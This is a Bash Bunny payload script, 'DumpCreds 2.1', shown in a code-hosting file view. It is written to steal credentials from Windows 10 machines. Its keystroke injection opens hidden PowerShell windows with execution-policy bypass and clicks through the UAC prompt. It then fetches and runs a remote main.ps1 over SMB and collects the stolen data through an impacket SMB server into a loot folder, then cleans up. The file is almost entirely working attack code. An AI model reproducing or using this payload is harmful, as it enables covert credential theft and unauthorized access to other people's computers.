/
payload.txt
166 lines (136 loc) · 4.74 KB
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
#!/bin/bash
#
# Title: DumpCreds 2.1
# Author: QDBA
# Version: 2.1.0
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
###### Lets Start ####
LED SETUP
GET SWITCH_POSITION
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot
# if the file DEBUG in payload folder exist, enter debug mode
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
DEBUG=0
fi
mkdir -p $LOOTDIR
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID
Q DELAY 5000
# Launch initial cmd
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
# Launch powershell as admin (red window)
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
Q ENTER
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
Q DELAY 1000
Q ALT j
Q DELAY 500
Q ENTER
Q DELAY 1000
Q ALT n
Q DELAY 500
Q ENTER
LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000
Q ENTER
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
/tools/impacket/examples/smbserver.py e $SWITCHDIR &
# Give target a chance to start exfiltration
sleep 2
GET TARGET_IP
# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
LED STAGE4
# Handshake Bunny and Computer
while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1
done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready
while ! [ -f $SWITCHDIR/CON_EOF ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 2
done
LED CLEANUP
# Cleanup
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
# realy the end....
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH